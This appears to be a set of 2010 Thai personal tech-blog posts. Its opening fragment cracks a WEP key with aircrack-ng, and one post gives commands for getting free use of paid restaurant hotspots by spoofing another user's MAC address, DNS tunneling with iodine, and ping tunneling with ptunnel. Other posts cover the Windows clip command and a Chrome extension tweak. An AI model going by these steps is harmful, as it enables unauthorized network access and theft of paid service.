กด Ctrl+C เพื่อหยุดเมื่อได้จำนวนข้อมูลที่ดักจับได้ เป็นจำนวนที่พอใจแล้ว

แกะรหัสผ่าน
เมื่อได้ข้อมูลมามากพอสมควร  (บางที่บอก > 5000, บางที่บอก >30,000, แต่ยิ่งมากก็ยิ่งดี) โดยดูจากคำสั่ง airodump-ng ที่รันอยู่
จะพบว่า airodump-ng นั้นสร้าง ไฟล์ออกมา  (.cap)   ในที่นี้ไฟล์ต่างๆจะขึ้นต้นด้วย wep

ให้เรานำไฟล์แรกของชุดไฟล์นั้นเข้าไปในคำสั่ง  (ในที่นี้คือ wep-01.cap)
aircrack-ng  [filename]          ; เพื่อทำการ crack หา pass key ของ wireless AP นั้น  
เมื่อได้ pass key มาแล้ว เราก็จะเอาไปใช้ในการ login เพื่อใช้ในการ เข้าไปใช้ wireless AP นั้นต่อไป




VDO

9/10/2010

Using command to output to clipboard

ใน Win7,Vista มีคำสั่งที่ชื่อ clip มาให้เล่นกัน  แต่บนXP อาจจะต้องโหลดตัวนี้เพิ่ม
ftp://ftp.microsoft.com/Services/TechNet/samples/PS/Win98/Reskit/FILE/CLIP.EXE
แล้วนำไปวางไว้ใน C:\Windows ซะก่อน

คำสั่ง clip คือคำสั่งเอาไว้เอาข้อมูลไปใส่ไว้ใน clipboard เพื่อรอการ กด paste ไปที่อื่นต่อไป
วิธีใช้
แบบ Pipe
<command> | clip
แบบ redirect
clip < filename.txt
เช่น echo test | clip type single.php | clip clip < single.php นอกจากนี้เรายังแก้ไขให้มีการคลิ๊กขวาที่ filename.txt แล้วมีเมนูให้ copy ค่าเข้า clipboard ด้วย
ทำโดยการ เพิ่ม key เข้าไปใน HKEY_CLASSES_ROOT\txtfile\shell ให้กลายเป็นแบบในรูปนี้
HKEY_CLASSES_ROOT\txtfile\shell\copytoclip\command\
ตั้งค่า(Default)ให้มีค่าเป็น 
cmd /c clip < "%1"
เรียบร้อย

9/06/2010

วิธีbypass ให้ใช้เน็ตในhotspotได้

Reference VDO by www.infinityexists.com

ร้านอาหารบางร้าน มีการให้บริการอินเตอร์เน็ตไร้สายฟรีกับลูกค้าด้วย  ปกติแล้วจะให้ฟรี 1-2 ชม.
แล้วชม.ต่อไปก็ต้องจ่ายเงิน

แต่ถ้าเราไม่อยากซื้อของ ไม่อยากจ่ายตังค์ แต่อยากเล่น internet ฟรี

ก็ทำได้ง่ายๆ 3 วิธี คือ

1. Session Stealing
     ใช้วิธีการต่อเข้าไปในระบบwireless เพื่อดักจับดูว่า มีใครเล่นเน็ตอยู่บ้าง
    
#airodump-ng   rausb0
               ;ดูว่าตอนนี้มี wifi hotspot อะไรบ้าง เช็คโดยผ่านconnection rausb0
#airodump-ng  --bssid [mac address ของ hotspot]  rausb0
     ;เช็คว่ามีใครใช้อะไรบ้างในhotspotนี้
     แล้วก็เช็คว่า คนๆนั้้นได้เล่นเน็ตอยู่จริงๆ (คือมี data traffic วิ่งอยู่)
     แล้วก็ดูว่า คนๆนั้น มี MAC adress อะไร
     เสร็จแล้วก็ เปลี่ยน MAC address ของเรา ให้เป็นค่า MAC address ที่เราเพิ่งขโมยมา
     #macchanger  -m  [macที่จะเปลี่ยนไปเป็น]    rausb0       ;เปลี่ยนMACของdeviceชื่อ rausb0

2. DNS Tunneling
     ใช้โปรแกรมชื่อ iodine ในการ tunnel ข้อมูลในการต่อเน็ต  ให้ไปอยู่ในรูปแบบ DNS packet (เอาheader DNS packet ครอบหัวทุกๆข้อมูลที่จะส่งต่อเน็ต)
     เนื่องจาก บางhotspot อนุญาตให้เราส่ง DNS packet ออกไปถามที่อื่นได้  แต่บล๊อคไม่ให้ใช้เน็ต
การหลอก packet ที่จะวิ่งผ่านเน็ตให้ปลอมตัวเป็น DNS packet จะทำให้ทะลุการป้องกันของHotspotไปได้

    เสร็จแล้วส่งผ่านไปยัง server ของเราที่เปิดรอรับไว้  เพื่อถอดDNS header ออก แล้วใช้เน็ตของเครื่อง server นั้นเพื่อท่องเวปต่อไป
  
    เครื่องมือ iodine, openvpn, real IP + real domain name, server
      +domain name hosting:
            - ตั้งให้มี custom DNS  วิ่งไปหา server ที่เราเปิดiodinedไว้     ใช้  NS, A

      +ฝั่ง Server:
            - ใช้ OpenVPN เพื่อสร้าง connection จำลองขึ้นมาก่อนที่ server
            - รัน iodined  [server_ipที่จะสร้างขึ้นเมื่อมีclientเข้ามา]  [dns_suffix]    ;เพื่อสร้างdaemonมารองรับการถอด dns header โดยdaemon ตัวนี้จะตอบสนองกับDNS packet ที่มี dns_suffix ที่ระบุไว้เท่านั้น
            - เปิด service SSH

      +ฝั่ง Client:
            - ใช้ iodine -f [real_server_ip]    [dns_suffix ที่ตั้งไว้]     ;จะทำให้เราส่งข้อมูลทุกอย่างผ่านDNS ไปยังserverเรา
            - สร้าง Sock Proxy ด้วยการใช้ putty เปิด SSH connection ไปหาเครื่อง server   จะทำให้มีportใหม่ขึ้น
            - ตั้งให้ browser วิ่งผ่าน sock proxy ที่เพิ่งสร้าง


3. IP Tunneling
    วิธีสุดท้ายสร้าง tunnel ผ่าน Ping   ก็จะเหมือนกับ DNS Tunnel ในข้อ2
แต่ต้องมั่นใจซะก่อนว่า ทางhotspotไม่บล๊อค ICMP ด้วยการทดลองpingอะไรซักอย่าง

    อุปกรณ์  PingTunnel(ptunnel), LibPCap
    + ฝั่งServer:
            - รัน  ptunnel

    + ฝั่งClient:
            - รัน  ptunnel  -p  [server_ip]   -lp  [listening_port] -da [proxy_server_ip]  -dp [proxy_port]
            - เนื่องจากเป็น sock proxy,  เลยต้องใช้ Putty สร้าง ssh tunnel ด้วย
            - ตั้งให้ browser วิ่งผ่าน sock proxy ที่เพิ่งสร้าง

วิดีโอของทั้งสามวิธี  (แต่เนื่องจากมันไม่ได้ตัดวีดีโอเป็นไฟล์ละเทคนิค ก็เลยต้องทำแบบนี้)







ทั้งหมดนี้ยังไม่ได้ลอง และถ้ามีอะไรผิดพลาดก็ comment ไว้นะ

9/03/2010

ตั้ง Google Mail Checker Plus ให้รองรับ Priority Mail ใน Gmail

ปกติแล้ว Google Mail Checker Plus (extensionsในChrome) เมื่อถูกคลิ๊ก แล้วจะไปเปิดหน้า inbox ของ GMail ให้
ซึ่งก็ดีอยู่แล้วจนกระทั่ง Gmail ออก Priority Inbox มา  ที่จะจัดเรียงemailเราตามลำดับความสำคัญ
คราวนี้ ใน Gmail ก็เลยมีสองกล่องข้อความ
   กล่องแบบ inbox ปกติ
   กับกล่อง priority inbox  ที่เอาข้อความ Inbox มาจัดเรียงให้ตามความสำคัญ

แต่ extension ตัวนี้ เวลาโดนคลิ๊กแล้ว ดันไปวิ่งเข้าแต่ inbox นี่สิ  (version 1.7.2) ก็เลยขัดใจ ทำไมไม่วิ่งเข้า priority inbox นะ
เลยไปหาทางแก้ในเวปของมัน  เจออันนี้เข้า http://chrome.desc.se/forum/viewtopic.php?id=202
วิธีแก้คือ
   1. เข้าไปที่ User Data folder ของ Chrome  ปกติอยู่ที่ C:\Users\\AppData\Local\Google\Chrome\User Data
วิธีเข้าในOSอื่นดูที่ http://www.chromium.org/user-experience/user-data-directory
   2. เข้าไปต่อใน Default\Extensions\gffjhibehnempbkeheiccaincokdjbfe\
   3. เปิดไฟล์  mailaccount.class.js
   4. แก้บรรทัด 60 กับ 61 จาก #inbox ไปเป็น #mbox
   5. restart Google Chrome